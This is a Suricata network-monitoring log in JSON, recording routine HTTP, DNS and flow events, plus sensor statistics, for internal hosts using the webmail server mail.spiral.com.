{"timestamp":"2020-02-29T00:20:48.443663+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968}} 
{"timestamp":"2020-02-29T00:20:51.001279+0000","flow_id":1337670470361580,"event_type":"flow","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:50.221676+0000","end":"2020-02-29T00:15:50.330124+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:53.000335+0000","flow_id":737255532685455,"event_type":"flow","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":23,"bytes_toserver":4481,"bytes_toclient":19168,"start":"2020-02-29T00:19:46.616591+0000","end":"2020-02-29T00:19:52.947214+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.000827+0000","flow_id":1877711068348992,"event_type":"flow","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:52.475712+0000","end":"2020-02-29T00:15:52.580812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:20:53.000963+0000","flow_id":1479997112177472,"event_type":"flow","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1895,"bytes_toclient":4685,"start":"2020-02-29T00:19:47.906048+0000","end":"2020-02-29T00:19:52.945156+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.001091+0000","flow_id":217650389304327,"event_type":"flow","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":2315,"bytes_toclient":3905,"start":"2020-02-29T00:19:47.902151+0000","end":"2020-02-29T00:19:52.945077+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.002294+0000","flow_id":1813814855284147,"event_type":"flow","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":13,"bytes_toserver":3894,"bytes_toclient":7440,"start":"2020-02-29T00:19:47.865715+0000","end":"2020-02-29T00:19:52.945234+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:53.445189+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2505,"tx_id":1}} {"timestamp":"2020-02-29T00:20:54.000194+0000","flow_id":1702579497324555,"event_type":"flow","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":17,"bytes_toserver":3120,"bytes_toclient":17124,"start":"2020-02-29T00:19:47.905227+0000","end":"2020-02-29T00:19:53.135539+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:54.001106+0000","flow_id":1347789426886640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":2079,"bytes_toclient":5519,"start":"2020-02-29T00:19:17.296944+0000","end":"2020-02-29T00:19:53.109237+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:55.000254+0000","event_type":"stats","stats":{"uptime":14907,"capture":{"kernel_packets":137460,"kernel_drops":0},"decoder":{"pkts":137460,"bytes":94232530,"invalid":193,"ipv4":135909,"ipv6":10,"ethernet":137460,"raw":0,"null":0,"sll":0,"tcp":130403,"udp":5298,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2840,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2856,"synack":2847,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1875,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2425,"failed_udp":113},"tx":{"http":4804,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2507}},"flow_mgr":{"closed_pruned":2815,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":5,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:55.135421+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37860,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:20:56.000605+0000","flow_id":787291901945212,"event_type":"flow","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:19:50.484732+0000","end":"2020-02-29T00:19:55.771502+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:56.000896+0000","flow_id":969742112447211,"event_type":"flow","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":36752,"start":"2020-02-29T00:19:46.449259+0000","end":"2020-02-29T00:19:55.763745+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:00.316893+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":784,"tx_id":0}} {"timestamp":"2020-02-29T00:21:02.000253+0000","event_type":"stats","stats":{"uptime":14914,"capture":{"kernel_packets":137463,"kernel_drops":0},"decoder":{"pkts":137469,"bytes":94234978,"invalid":193,"ipv4":135918,"ipv6":10,"ethernet":137469,"raw":0,"null":0,"sll":0,"tcp":130410,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2819,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state"
:0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} {"timestamp":"2020-02-29T00:21:03.000612+0000","flow_id":784388504545285,"event_type":"flow","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":698,"start":"2020-02-29T00:19:57.387077+0000","end":"2020-02-29T00:20:02.578497+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:04.000653+0000","flow_id":1369582092931394,"event_type":"flow","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":43,"pkts_toclient":40,"bytes_toserver":8611,"bytes_toclient":34906,"start":"2020-02-29T00:19:47.905538+0000","end":"2020-02-29T00:20:03.977950+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:05.000382+0000","flow_id":1602206096945749,"event_type":"flow","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:03.979541+0000","end":"2020-02-29T00:16:04.086107+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:09.000186+0000","event_type":"stats","stats":{"uptime":14921,"capture":{"kernel_packets":137469,"kernel_drops":0},"decoder":{"pkts":137472,"bytes":94235176,"invalid":193,"ipv4":135921,"ipv6":10,"ethernet":137472,"raw":0,"null":0,"sll":0,"tcp":130413,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2821,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20502,"memcap_state":0,"memcap_global":0},"http":{"memuse":18854,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:11.000855+0000","flow_id":2077710532005367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6224,"start":"2020-02-29T00:20:04.445943+0000","end":"2020-02-29T00:20:10.267899+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:12.088636+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:12.344766+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:21:14.000206+0000","flow_id":144498492304586,"event_type":"flow","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:13.650442+0000","end":"2020-02-29T00:16:13.758493+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:16.000229+0000","event_type":"stats","stats":{"uptime":14928,"capture":{"kernel_packets":137475,"kernel_drops":0},"decoder":{"pkts":137492,"bytes":94245717,"invalid":193,"ipv4":135941,"ipv6":10,"ethernet":137492,"raw":0,"null":0,"sll":0,"tcp":130429,"udp":5304,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2842,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2858,"synack":2849,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1877,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2427,"failed_udp":114},"tx":{"http":4806,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2509}},"flow_mgr":{"clos
ed_pruned":2822,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":104401,"memcap":0}}} {"timestamp":"2020-02-29T00:21:17.200064+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48902,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.208063+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64597,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:21:17.386661+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360}} {"timestamp":"2020-02-29T00:21:17.425113+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":37397,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.440353+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} 
{"timestamp":"2020-02-29T00:21:17.442545+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.442807+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} {"timestamp":"2020-02-29T00:21:17.459364+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} 
{"timestamp":"2020-02-29T00:21:17.460875+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:21:17.462601+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} 